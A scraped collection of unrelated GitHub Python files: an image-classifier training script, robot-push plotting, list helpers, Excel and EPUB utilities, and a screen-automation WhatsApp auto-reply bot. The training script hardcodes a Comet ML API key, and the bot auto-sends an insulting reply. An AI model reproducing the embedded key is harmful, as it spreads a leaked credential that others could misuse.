model.load(args.saved_model_path)\n    else:\n        raise ValueError('No saved model was specified in test mode.')\n\n    model.eval()\n    # test_loss = 0\n    # test_correct = 0\n    predictions = []\n    # targets = []\n    img_names = [] # get names of each image without full path or extension. (we need names to order result)\n\n    with torch.no_grad():\n        for batch_idx, (data, target, paths) in enumerate(test_loader):\n            data, target = data.to(device), target.to(device)\n            output = model(data)\n            pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n            predictions.append(pred)\n            img_names += [Path(path).name.split('.')[0] for path in paths]\n            # targets.append(target)\n            # test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n            # test_correct += pred.eq(target.view_as(pred)).sum().item()\n\n    # I commented it out since we don't have test set targets with which to compute performance metrics.\n    # test_loss /= len(test_loader.dataset)\n    # test_acc = 100. 
* test_correct / len(test_loader.dataset)\n # print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n # test_loss, test_correct, len(test_loader.dataset), test_acc))\n\n # save predictions\n predictions = torch.cat(predictions, 0)\n save_predictions(args, img_names, predictions)\n\ndef save_predictions(args, img_names, predictions):\n print('Saving predictions...')\n preds_path = \"output/\" + args.model + \"/predictions.csv\"\n\n img_names = np.array(img_names)\n predictions = predictions.cpu().numpy().flatten()\n result = dict(zip(img_names, predictions)) # combine image name and prediction into a dictionary.\n class_dict = {0: 'Cat', 1: 'Dog'}\n\n with open(preds_path, 'w', newline='\\n') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',')\n csvwriter.writerow(['id', 'label'])\n\n for i in range(len(img_names)):\n id = str(i+1)\n label = result[id]\n csvwriter.writerow([id, class_dict[label]])\n\ndef tune_hyperparams():\n api_key = \"w7QuiECYXbNiOozveTpjc9uPg\"\n optimizer = comet_ml.Optimizer(api_key)\n\n # hyperparameters in PCS format\n params = \"\"\"\n x integer [1, 10] [10]\n \"\"\"\n optimizer.set_params(params)\n\n while True:\n suggestion = optimizer.get_suggestion()\n experiment = Experiment(api_key, project_name=\"project1-ac2g\",\n workspace=\"ift6135\")\n score = train(suggestion[\"x\"])\n suggestion.report_score(\"accuracy\", score)\n\ndef main():\n # Training settings\n args = configure_arguments()\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # sets seeds to prevent any unwanted randomness.\n torch.manual_seed(args.seed)\n if use_cuda:\n torch.cuda.manual_seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n\n device = torch.device(\"cuda:1\" if use_cuda else \"cpu\")\n\n train_loader, val_loader, test_loader = create_dataloaders(args)\n\n # get instance of model.\n print('Loading the {0} model...'.format(args.model))\n model_class = models.find_model(args.model)\n model = model_class().to(device)\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n no_of_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('Model has {0} parameters'.format(no_of_params))\n\n if args.mode == 'train':\n print('Running in train mode...')\n\n #set up logging.\n experiment = Experiment(api_key=\"w7QuiECYXbNiOozveTpjc9uPg\", project_name=\"project1-ac2g\", workspace=\"ift6135\")\n create_folder('output/' + args.model + '/' + experiment.get_key())\n hyper_params = vars(args)\n experiment.log_parameters(hyper_params)\n\n train(args, model, device, (train_loader, val_loader), optimizer, experiment)\n elif args.mode == 'test':\n print('Running in test mode...')\n test(args, model, device, test_loader)\n\nif __name__ == '__main__':\n main()\n","repo_name":"onucharles/project1-ac2g","sub_path":"problem3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32105325532","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom mpl_toolkits import mplot3d\nimport json\nimport os\n\nfrom cri import transforms\nimport pybullet as p\nimport glob\n\nfrom robopush.utils import Namespace\n\n# data_dir = 'red_cube_straight'\n# data_dir = 'red_cube_curve'\n# data_dir = 'red_cube_sin'\n\n# data_dir = 'cylinder_straight'\n# data_dir = 'cylinder_curve'\n# data_dir = 'cylinder_sin'\n\n# 
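A quick note on the artifact that `save_predictions` writes above: it is a two-column `id,label` CSV with 'Cat'/'Dog' labels, so it can be sanity-checked after a run with plain pandas (illustrative sketch; the path assumes the default `--model` value used above):

```python
import pandas as pd

preds = pd.read_csv('output/BaseConvNet/predictions.csv')
assert list(preds.columns) == ['id', 'label']
print(preds['label'].value_counts())  # rough class balance of the predictions
```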
data_dir = 'triangle_straight'\n# data_dir = 'triangle_curve'\ndata_dir = 'triangle_sin'\n\ntraj_files = glob.glob(\n os.path.join(\n os.path.dirname(__file__),\n 'collected_data',\n data_dir+\"/*.npy\"\n )\n )\n\nnum_traj = int(len(traj_files)/2)\n\n# setup figure\nfig, ax = plt.subplots()\n\ndef basepos_to_workpos(pos):\n \"\"\"\n Transforms a vector in world frame to a vector in work frame.\n \"\"\"\n work_frame = np.array([-200.0, -420.0, 55, -180, 0, 0])\n transformation_matrix = transforms.euler2mat(work_frame, axes='rxyz')\n inv_transformation_matrix = np.linalg.inv(transformation_matrix)\n\n pos_mat = transforms.euler2mat([*pos,0,0,0])\n\n workframe_pos_mat = np.dot(inv_transformation_matrix, pos_mat)\n workframe_pos = transforms.mat2euler(workframe_pos_mat)\n\n # workframe_pos = pos + [350, -520, 0]\n # workframe_pos = pos + [0, 0, 0]\n\n # workframe_pos += np.array([20, 0, 0, 0, 0, 0])\n\n return np.array(workframe_pos)\n\ndef get_tip_direction_workframe(current_tip_pose):\n \"\"\"\n Warning, deadline research code (specific to current workframe)\n \"\"\"\n # angle for perp and par vectors\n par_ang = -( current_tip_pose[5] ) * np.pi/180\n perp_ang = -( current_tip_pose[5] - 90 ) * np.pi/180\n\n # create vectors (directly in workframe) pointing in perp and par directions of current sensor\n workframe_par_tip_direction = np.array([np.cos(par_ang), np.sin(par_ang), 0]) # vec pointing outwards from tip\n workframe_perp_tip_direction = np.array([np.cos(perp_ang), np.sin(perp_ang),0]) # vec pointing perp to tip\n\n return workframe_par_tip_direction, workframe_perp_tip_direction\n\n# plot target trajectory\ndef plot_traj():\n for i in range(num_traj):\n traj_pos = np.load(os.path.join('collected_data', data_dir, 'traj_pos_{}.npy'.format(i))) * 1000\n traj_rpy = np.load(os.path.join('collected_data', data_dir, 'traj_rpy_{}.npy'.format(i))) * 180 / np.pi\n\n for pos, rpy in zip(traj_pos, traj_rpy):\n pose = np.concatenate([pos, rpy], axis=0)\n par_dir, perp_dir = get_tip_direction_workframe(pose)\n\n goal_x, goal_y = pos[0], pos[1]\n par_x, perp_x = par_dir[0], perp_dir[0]\n par_y, perp_y = par_dir[1], perp_dir[1]\n\n ax.scatter(goal_x, goal_y, color='b', marker='.', alpha=1.0)\n\n ax.quiver(goal_x, goal_y,\n par_x, par_y,\n color='g', alpha=1.0, scale=25.0, angles='uv',\n width=0.0025, headwidth=2.5, headlength=5.0)\n\n ax.quiver(goal_x, goal_y,\n perp_x, perp_y,\n color='r', alpha=1.0, scale=25.0, angles='uv',\n width=0.0025, headwidth=2.5, headlength=5.0)\n\ndef plot_realsense_data():\n\n rs_save_file = os.path.join(\n 'collected_data',\n data_dir,\n 'rs_data',\n 'rs_data.pkl'\n )\n\n rs_data = Namespace()\n rs_data.load(rs_save_file)\n\n # convert centroids to workframe\n trans_centroids = np.array([basepos_to_workpos(pos) for pos in rs_data.base_centroids])\n\n # Plot and save ArUco marker centroid trajectory\n ax.scatter(\n trans_centroids[:, 0],\n trans_centroids[:, 1],\n marker='.',\n color='r',\n alpha=0.15\n )\n\n # ax.scatter(rs_data.base_poses[:, 0, 3], rs_data.base_poses[:, 1, 3], marker='.')\n\n\n\nplot_traj()\nplot_realsense_data()\n\n# format plot\n\n# ax.set_xlim(np.min(px), np.max(px))\n# ax.set_ylim(np.min(py), np.max(py))\n\nax.invert_yaxis()\nax.axis('equal')\n\n# fig.savefig(\n# os.path.join(\n# 'collected_data',\n# data_dir,\n# 'traj_scatter.png'\n# ),\n# dpi=320,\n# pad_inches=0.01,\n# bbox_inches='tight'\n# 
)\n\nplt.show()\n","repo_name":"yijionglin/tactile_gym_sim2real","sub_path":"tactile_gym_sim2real/online_experiments/object_push_env/plot_push_data.py","file_name":"plot_push_data.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"5562372004","text":"def filter_custom(l, f):\n    '''filter a list using a function\n    return a new list that contains all the elements e of l for which f(e) is True\n    :param l: a list\n    :param f: a function that takes one argument and returns either True or False'''\n\n\n    return [e for e in l if f(e)]\n\n\ndef map_custom(l, f):\n\n    '''map a list using a function\n    return a new list that applies f(e) for every element in l\n\n    :param l: a list\n    :param f: a function that takes one argument and returns a value'''\n\n    new_list = []\n    for e in l:\n        new_list.append(f(e))\n    return new_list\n\ndef reduce_custom(l, f, starting_value):\n    '''reduce a list using a reducer function and a starting value\n    return a single value that applies f(v, e) for every e in l from left to right. the initial value for v should be starting_value, and subsequent values should be the previously calculated value from f(v, e)\n\n:param l: a list\n:param f: a function that takes two arguments and returns a value\n:param starting_value: the beginning value for the reducer function computation'''\n\n    left_argument = starting_value\n    for right_argument in l:\n        left_argument = f(left_argument, right_argument)\n    return left_argument\n\n\n\n\nif __name__ == '__main__':\n    l = [7,8,9]\n    f = lambda x: x * 10\n    print(map_custom(l, f))\n    print(filter_custom(l, f))\n    print(reduce_custom([1,2,3,17], lambda a, b: a + b, 0))\n\n\n\n","repo_name":"DPF0190/npd_c2_a7","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28457112645","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nimport pandas as pd\nimport re\nfrom unidecode import unidecode\nimport datetime\n\nclass fetchUtils():\n    def __init__(self, contrib_db):\n        self.contrib_db = contrib_db # \"contribs_boolean.xlsx\"\n        xl = pd.ExcelFile(self.contrib_db)\n        self.contrib_df = xl.parse('Contributors')\n        self.contrib_df['lookup'] = self.contrib_df.apply(lambda x: self.get_name_lookup(x['given_name'], x['surname']), axis=1)\n        self.contrib_wb = load_workbook(self.contrib_db)\n        self.contrib_ws = self.contrib_wb.get_sheet_by_name(\"Contributors\")\n\n    def get_name_lookup(self, given_name, family_name):\n        str = \"{}{}\".format(given_name, family_name).lower().replace(\" \", \"\")\n        str = re.sub(r'[^\\w\\s]', '', str)\n        str = unidecode(str).strip()\n        return str\n\n    def get_name_parts(self, contrib):\n        return contrib.split(\" \", 1)\n\n    def get_contibs(self, contribs, affiliation = \"\"):\n        contrib_keys = []\n\n        if len(contribs) == 0:\n            return \"\"\n\n        for contrib in contribs:\n            if contrib in [\"Foreword\", \"Vorwort\"]:\n                contrib = \"Manfred Schewe\"\n            contrib = \" \".join(contrib.split()).strip()\n            name_parts = self.get_name_parts(contrib)\n            if len(name_parts) < 2:\n                continue\n            else:\n                given_name = name_parts[0]\n                family_name = name_parts[1]\n                lookup = self.get_name_lookup(given_name, family_name)\n                matches_df = self.contrib_df[self.contrib_df['lookup'].eq(lookup)]\n                if len(matches_df) > 0: \n                    
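For comparison with the hand-rolled filter_custom / map_custom / reduce_custom record above: Python ships the same three primitives as built-ins plus functools.reduce, with matching left-fold semantics (a small equivalence check, not part of the original file):

```python
from functools import reduce

l = [7, 8, 9]
assert list(map(lambda x: x * 10, l)) == [70, 80, 90]
assert list(filter(lambda x: x > 7, l)) == [8, 9]
# Left fold: ((((0+1)+2)+3)+17) == 23, same as reduce_custom.
assert reduce(lambda acc, e: acc + e, [1, 2, 3, 17], 0) == 23
```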
contrib_keys.append(matches_df.iloc[0]['id'])\n else:\n df_row = {\n 'id': lookup,\n 'given_name': given_name,\n 'surname': family_name,\n 'orcid': '',\n 'primary_affiliation': affiliation,\n 'secondary_affiliation': '',\n 'email_for_ucc_authors': '',\n 'lookup': lookup\n } \n self.contrib_df = self.contrib_df.append(df_row, ignore_index=True)\n self.contrib_ws.append([lookup, given_name,family_name, '', affiliation, '', ''])\n contrib_keys.append(lookup)\n\n contribs = '||'.join(contrib_keys)\n return contribs\n\n def save_wb(self):\n self.contrib_wb.save(self.contrib_db)\n\n def get_full_date(self, date, issue_no=''):\n if len(date) == 4:\n if issue_no == '01':\n mnt = '01'\n elif issue_no == '02':\n mnt = '07'\n else:\n mnt = '01'\n #return \"{}-{}-01\".format(date, mnt)\n return datetime.datetime(int(date), int(mnt), 1).date()\n elif len(date) == 7:\n #return \"{}-{}-01\".format(date[0:4], date[5:7])\n return datetime.datetime(int(date[0:4]), int(date[5:7]), 1).date()\n else:\n return date","repo_name":"eocarragain/xMeta","sub_path":"fetchutils.py","file_name":"fetchutils.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39663340609","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport urllib\ntry:\n from urllib import unquote\nexcept:\n from urllib.parse import unquote\nimport zipfile\n\nimport xml.parsers.expat\nimport html2text\nfrom glob import glob\n\n\nclass ContainerParser():\n def __init__(self, xmlcontent=None):\n self.rootfile = \"\"\n self.xml = xmlcontent\n\n def startElement(self, name, attributes):\n if name == \"rootfile\":\n self.buffer = \"\"\n self.rootfile = attributes[\"full-path\"]\n\n def parseContainer(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.Parse(self.xml, 1)\n return self.rootfile\n\n\nclass BookParser():\n def __init__(self, xmlcontent=None):\n self.xml = xmlcontent\n self.title = \"\"\n self.author = \"\"\n self.inTitle = 0\n self.inAuthor = 0\n self.ncx = \"\"\n\n def startElement(self, name, attributes):\n if name == \"dc:title\":\n self.buffer = \"\"\n self.inTitle = 1\n elif name == \"dc:creator\":\n self.buffer = \"\"\n self.inAuthor = 1\n elif name == \"item\":\n if attributes[\"id\"] == \"ncx\" or attributes[\"id\"] == \"toc\" or attributes[\"id\"] == \"ncxtoc\":\n self.ncx = attributes[\"href\"]\n\n def characters(self, data):\n if self.inTitle:\n self.buffer += data\n elif self.inAuthor:\n self.buffer += data\n\n def endElement(self, name):\n if name == \"dc:title\":\n self.inTitle = 0\n self.title = self.buffer\n self.buffer = \"\"\n elif name == \"dc:creator\":\n self.inAuthor = 0\n self.author = self.buffer\n self.buffer = \"\"\n\n def parseBook(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.EndElementHandler = self.endElement\n parser.CharacterDataHandler = self.characters\n parser.Parse(self.xml, 1)\n return self.title, self.author, self.ncx\n\n\nclass NavPoint():\n def __init__(self, id=None, playorder=None, level=0, content=None, text=None):\n self.id = id\n self.content = content\n self.playorder = playorder\n self.level = level\n self.text = text\n\n\nclass TocParser():\n def __init__(self, xmlcontent=None):\n self.xml = xmlcontent\n self.currentNP = None\n self.stack = []\n self.inText = 0\n self.toc = []\n\n def startElement(self, name, attributes):\n if name == 
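All of the parser classes in this epub2txt record follow one xml.parsers.expat pattern: create a stream parser, attach handler callbacks, then feed it the document. A minimal standalone illustration of that pattern on a toy XML string (not an EPUB):

```python
import xml.parsers.expat

seen = []
p = xml.parsers.expat.ParserCreate()
# The start-element handler receives the tag name and an attribute dict.
p.StartElementHandler = lambda name, attrs: seen.append((name, attrs))
p.Parse('<root><item id="1"/></root>', 1)  # 1 marks the final chunk
assert seen == [('root', {}), ('item', {'id': '1'})]
```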
\"navPoint\":\n level = len(self.stack)\n self.currentNP = NavPoint(\n attributes[\"id\"], attributes[\"playOrder\"], level)\n self.stack.append(self.currentNP)\n self.toc.append(self.currentNP)\n elif name == \"content\":\n self.currentNP.content = unquote(attributes[\"src\"])\n elif name == \"text\":\n self.buffer = \"\"\n self.inText = 1\n\n def characters(self, data):\n if self.inText:\n self.buffer += data\n\n def endElement(self, name):\n if name == \"navPoint\":\n self.currentNP = self.stack.pop()\n elif name == \"text\":\n if self.inText and self.currentNP:\n self.currentNP.text = self.buffer\n self.inText = 0\n\n def parseToc(self):\n parser = xml.parsers.expat.ParserCreate()\n parser.StartElementHandler = self.startElement\n parser.EndElementHandler = self.endElement\n parser.CharacterDataHandler = self.characters\n parser.Parse(self.xml, 1)\n return self.toc\n\n\nclass epub2txt():\n def __init__(self, epubfile=None):\n self.epub = epubfile\n\n def convert(self):\n # print \"Processing %s ...\" % self.epub\n file = zipfile.ZipFile(self.epub, \"r\")\n rootfile = ContainerParser(\n file.read(\"META-INF/container.xml\")).parseContainer()\n title, author, ncx = BookParser(file.read(rootfile)).parseBook()\n ops = \"/\".join(rootfile.split(\"/\")[:-1])\n if ops != \"\":\n ops = ops+\"/\"\n toc = TocParser(file.read(ops + ncx)).parseToc()\n\n # fo = open(\"%s_%s.txt\" % (title, author), \"w\")\n content = []\n for t in toc:\n # this could be improved. see https://github.com/soskek/bookcorpus/issues/26\n html = file.read(ops + t.content.split(\"#\")[0])\n text = html2text.html2text(html.decode(\"utf-8\"))\n # fo.write(\"*\"*(t.level+1) + \" \" + t.text.encode(\"utf-8\")+\"\\n\")\n # fo.write(t.text.encode(\"utf-8\")+\"{{{%d\\n\" % (t.level+1))\n # fo.write(text.encode(\"utf-8\")+\"\\n\")\n content.append(\"*\" * (t.level+1) + \" \" +\n t.text + \"\\n\")\n content.append(t.text + \"{{{%d\\n\" % (t.level+1))\n content.append(text + \"\\n\")\n\n # fo.close()\n file.close()\n return ''.join(content)\n\n\nif __name__ == \"__main__\":\n if sys.argv[1]:\n filenames = glob(sys.argv[1])\n for filename in filenames:\n txt = epub2txt(filename).convert()\n print(txt)\n","repo_name":"soskek/bookcorpus","sub_path":"epub2txt.py","file_name":"epub2txt.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":735,"dataset":"github-code","pt":"35"} +{"seq_id":"20242874913","text":"import pyautogui as pt\nfrom time import sleep\nimport pyperclip\nimport random\n\nsleep(5)\n\n\ndef copy_message_routine():\n global x, y\n\n pt.moveTo(x, y, duration=.05)\n pt.moveTo(x + 40, y - 40, duration=.5)\n pt.tripleClick()\n pt.rightClick()\n pt.moveRel(12, 15)\n pt.click()\n\n\ndef paste_message_routine(message):\n global x, y\n\n pt.moveTo(x + 30, y + 20, duration=.5)\n pt.click()\n\n pt.typewrite(message)\n\n pt.typewrite('\\n')\n\n\ndef open_chat_routine():\n global x, y\n\n pt.moveTo(x, y)\n pt.moveRel(-100, 0)\n pt.click()\n\n\ndef press_send_button_routine():\n global x, y\n\n get_position('wpp_project\\img\\send_button.png')\n\n pt.moveTo(x + 20, y + 20, duration=.5)\n\n pt.click()\n\n\ndef get_position(path):\n global x, y\n\n position1 = pt.locateOnScreen(path, confidence=.6)\n\n if position1:\n x = position1[0]\n y = position1[1]\n\n return True\n\n else:\n return False\n\n\ndef get_message():\n global x, y\n\n get_position('wpp_project\\img\\smile_paperclip.png')\n\n copy_message_routine()\n\n wpp_message = pyperclip.paste()\n pt.click()\n print('message 
received: ' + wpp_message)\n\n    return wpp_message\n\n\ndef post_response(message):\n    global x, y\n\n    get_position('wpp_project\\img\\\\text_box.png')\n\n    paste_message_routine(message)\n\n\ndef process_response(message):\n\n    if '?' in str(message).lower():\n        return 'beep! boop! I am a bot and I came to answer you'\n\n    else:\n        return 'beep! boop! I am a bot and according to my calculations there is a 99.9999% chance you get wrecked tonight, because you are a huge fool SAPEEEEE'\n\n\ndef message_checker():\n    global x, y\n\n    while True:\n        if get_position('wpp_project\\img\\green_point1.png'):\n\n            open_chat_routine()\n\n            processed_message = process_response(get_message())\n            post_response(processed_message)\n\n        print('Sleeping for 5 seconds')\n        sleep(5)\n\n\nx = 0\ny = 0\nmessage_checker()","repo_name":"hackedTsukikami/autoresponse-whatsapp-bot","sub_path":"wpp_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22604555036","text":"from pathlib import Path\n\nimport web_db\nfrom const import SERVER_HOST\n\n\nclass WebUtils:\n    def get_state_list(self):\n        data = web_db.Db()\n        result = []\n        status_html = \"\"\n        status_html_template = \"\"\"{state_name}  \"\"\"\n\n        html = \"\"\n        rows = data.getStateListLabels()\n        for row in rows:\n            status_html = status_html_template\n            status_html = status_html.replace(\"{host}\", SERVER_HOST)\n            status_html = status_html.replace(\"{state_id}\", str(row['id']))\n            status_html = status_html.replace(\"{state_name}\", row['state_name'])\n            html += status_html\n        return html\n\n    def get_html_menu(self):\n        html = Path('http_template/menu_template.html').read_text(encoding=\"utf-8\")\n        html = html.replace(\"{host}\", SERVER_HOST)\n        html = html.replace(\"{state_list}\", self.get_state_list())\n        return html\n\n    def check_cookie_token(self, cookies):\n        data = web_db.Db()\n        if \"token\" in cookies:\n            return data.checkToken(cookies['token'])\n\n        else:\n            return False\n","repo_name":"Logsod/noti_rest_server","sub_path":"webAnswers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"6965188312","text":"import os\nfrom packages.dirs import Dirs\nfrom packages.config import Config\nfrom openpyxl import load_workbook\nfrom app.classes.Logging import Logging\n\nclass Input():\n    files = None\n    current_file = ''\n    current_rayon = ''\n\n    def __init__(self):\n        all_files = self.showFiles()\n        self.files = self.filterFiles(all_files)\n        self.input_dir = Dirs().get('input')\n        self.rayons = Config('rayons').get()\n        self.from_row = Config().get('input_from_row')\n\n    # Get the list of files in the input folder\n    def showFiles(self):\n        input_dir = Dirs().get('input')\n        return [f for f in os.listdir(input_dir) if os.path.isfile(os.path.join(input_dir, f))]\n\n    # Remove extraneous files from the input file list\n    def filterFiles(self, files):\n        filter_files = []\n        for file in files:\n            if (file.endswith('.xlsx')):\n                filter_files.append(file)\n        return filter_files\n\n
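Before the worksheet-scanning methods that follow (getVplRange and friends), it may help to see the handful of openpyxl worksheet features they rely on: 'A1'-style indexing, max_row, and membership tests against merged_cells. A tiny in-memory demo with invented values:

```python
from openpyxl import Workbook

wb = Workbook()
ws = wb.active
ws['A1'] = 'header'
ws.merge_cells('A1:C1')

print(ws.max_row)               # 1
print(ws['A1'].value)           # 'header'
print('B1' in ws.merged_cells)  # True: B1 lies inside the merged block
```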
\"row_35\":rayon['row_35'],\n \"row_spec\":rayon['row_spec']\n })\n else:\n if (rayon['search'] in title.lower()) and (rayon['search_not'] not in title.lower()):\n rows = dict({\n \"id\":rayon['id'],\n \"row_fed\":rayon['row_fed'],\n \"row_vet\":rayon['row_vet'],\n \"row_reab\": rayon['row_reab'],\n \"row_mnogodet\":rayon['row_mnogodet'],\n \"row_35\":rayon['row_35'],\n \"row_spec\":rayon['row_spec']\n })\n\n if rows == None:\n error_text = 'Ошибка!!! Не удалось определить район по следующему заголовку: \"{}\"'.format(title)\n Logging().error(error_text)\n exit(error_text)\n return rows\n\n # Получаем информацию о типе выплаты содержащую С и ПО какую строку брать\n def getVplRange(self, ws):\n vpl = []\n\n max_row = ws.max_row\n merged_all = ws.merged_cells\n\n size_block = []\n temp_vpl = dict()\n\n for row in range(self.from_row, max_row):\n\n # Находим с какой строки начинается новый блок\n cell_a = \"{}{}\".format('A', row)\n if cell_a in merged_all:\n temp_vpl['from'] = row\n\n # Находим на какой строке заканчивается блок\n cell_c = \"{}{}\".format('C', row)\n try:\n if 'Итого по выплате' in ws[cell_c].value:\n temp_vpl['to'] = row\n except:\n pass\n\n # Сохраняем весь блок\n if len(temp_vpl) > 1:\n size_block.append(temp_vpl)\n temp_vpl = dict()\n\n return size_block\n\n # Получаем информацию об одной выплате\n def getOneVpl(self, ws, range_one):\n dataBlock = dict()\n\n cell_title = \"{}{}\".format('A', range_one['from'])\n title = ws[cell_title].value\n\n dataBlock['title'] = title\n\n cell_total_col = \"{}{}\".format('F', range_one['to'])\n dataBlock['total_col'] = ws[cell_total_col].value\n\n cell_total_sum_row = \"{}{}\".format('G', range_one['to'])\n cell_total_sum = ws[cell_total_sum_row].value\n\n if not (cell_total_sum == None):\n cell_total_sum = float(cell_total_sum.replace(',', '.'))\n cell_total_sum = float(\"{0:.2f}\".format(cell_total_sum))\n\n dataBlock['total_sum'] = cell_total_sum\n\n dataBlock['sb_col'] = 0\n dataBlock['sb_sum'] = 0\n for row in range(range_one['from'], range_one['to'] + 1):\n cell_vid_row = \"{}{}\".format('L', row)\n cell_vid = ws[cell_vid_row].value\n if cell_vid == 'сб/б':\n cell_sb_raw = \"{}{}\".format('G', row)\n cell_sb_str = ws[cell_sb_raw].value.strip()\n cell_sb = cell_sb_str.replace(',', '.')\n\n cell_col_raw = \"{}{}\".format('F', row)\n cell_col = ws[cell_col_raw].value.strip()\n\n try:\n dataBlock['sb_col'] = dataBlock['sb_col'] + int(cell_col)\n dataBlock['sb_sum'] = dataBlock['sb_sum'] + float(cell_sb)\n except:\n pass\n\n dataBlock['sb_sum'] = float(\"{0:.2f}\".format(dataBlock['sb_sum']))\n\n return dataBlock\n\n # Добавляем ID к одной выплате\n def getVplId(self, vpl):\n title = vpl['title'].strip()\n vpls = Config('vpl').get()\n\n vpl_meta = None\n for vpl in vpls:\n for like in vpl['like']:\n if like.lower() in title.lower():\n vpl_meta = dict({\n \"id\": vpl['id'],\n \"type\": vpl['type'],\n \"page_title\": vpl['page_title'],\n })\n\n if vpl_meta == None:\n error_text = 'Ошибка!!! Не удалось определить ID выплаты по заголовку: \"{}\"'.format(title)\n Logging().error(error_text)\n\n return vpl_meta\n\n\n # Добавляем ID к одной выплате\n def getTemplate(self, vpl_id):\n templates = Config('template').get()\n\n vpl_template = None\n for template in templates:\n if template['vpl_id'] == vpl_id:\n vpl_template = dict({\n \"sb_col\": template['sb_col'],\n \"sb_sum\": template['sb_sum'],\n \"total_col\": template['total_col'],\n \"total_sum\": template['total_sum'],\n })\n if vpl_template == None:\n pass\n # error_text = 'Ошибка!!! 
Could not determine the payment ID from the title: \"{}\"'.format(vpl_id)\n            # Logging().error(error_text)\n\n        return vpl_template\n\n    def filterVplOnMounth(self, vpl):\n        title = vpl['title'].strip()\n\n        app_config = Config().get()\n        user_config = Config('user_config').get()\n        user_mounth = user_config['mounth']\n        user_year = user_config['year']\n\n        search_string = ''\n        if not ((user_mounth == 0) or (user_mounth == \"\")):\n            for mounth in app_config['mounth']:\n                if mounth['id'] == user_mounth:\n                    search_string = str(mounth['title'])\n\n        if not (user_year == 0) or (user_year == \"\"):\n            if not (search_string == ''):\n                search_string = search_string + ' ' + str(user_year)\n            else:\n                search_string = str(user_year)\n\n        if not (search_string == None):\n            if search_string.lower() in title.lower():\n                return True\n        return False\n\n    def filterVpl(self, vpl):\n        title = vpl['title'].strip()\n        del_vpl_list = Config('delete_vpls').get()\n        for d_vpl in del_vpl_list:\n            if d_vpl.lower() in title.lower():\n                return False\n        return True\n\n    # Get info about all payments\n    def getVpls(self, ws):\n        vpl = []\n        ranges = self.getVplRange(ws)\n        for range_one in ranges:\n            one_vpl = self.getOneVpl(ws, range_one)\n            f_vpl = self.filterVpl(one_vpl)\n            f_vpl_on_mounth = self.filterVplOnMounth(one_vpl)\n\n\n            if (f_vpl == True) and (f_vpl_on_mounth == True):\n                vpl_meta = self.getVplId(one_vpl)\n                if not (vpl_meta == None):\n                    one_vpl['meta'] = vpl_meta\n                    one_vpl['template'] = self.getTemplate(vpl_meta['id'])\n\n                    vpl.append(one_vpl)\n            else:\n                error_text = 'Warning!!! The following payment was filtered out: \"{}\". Institution: \"{}\". File: \"{}\"'.format(one_vpl, self.current_rayon, self.current_file)\n                Logging().warning(error_text)\n        return vpl\n\n\n    # Get the contents of a single file\n    def getOne(self, file):\n        data = dict()\n\n        file_path = os.path.join(self.input_dir, file)\n        wb = load_workbook(filename=file_path)\n        ws = wb.worksheets[0]\n\n        # Get the district name\n        title_cell_raw = \"{}{}\".format('A', 2)\n        title = ws[title_cell_raw].value.strip()\n        data['file_name'] = file\n        data['title'] = title\n\n        self.current_file = file\n        self.current_rayon = title\n\n        # Get row numbers by name\n        data['meta'] = self.getRayonFromTitle(title)\n\n        # Add all payments\n        data['vpls'] = self.getVpls(ws)\n\n        wb.close()\n        return data\n\n    # Get the list of all files\n    def getAll(self):\n        data = []\n        for file in self.files:\n            file_content = self.getOne(file)\n            data.append(file_content)\n        return data","repo_name":"mcrack25/python_JKUMerger","sub_path":"app/models/InputNew.py","file_name":"InputNew.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"30747728574","text":"\"\"\"Test auction learning in symmetric and asymmetric implementations,\nusing a 2p-FPSB setup.\n\nThis script tests\n\n* whether the loop runs without runtime exceptions for a small number of iterations\n* whether the model learnt the appropriate bid for the top-range of valuations\n  (this value is expected to be learned _very_ fast as it's most significant\n  and as such should always be found (up to a certain range) even in a short amount of time)\n* Further, the script tests whether the utility after 200 iterations is in the expected range,\n  if it isn't it won't fail but issue a warning (because this might just be due to\n  stochasticity as it would take a significantly longer test time / more iterations to make sure.)\n\"\"\"\nimport warnings\nimport 
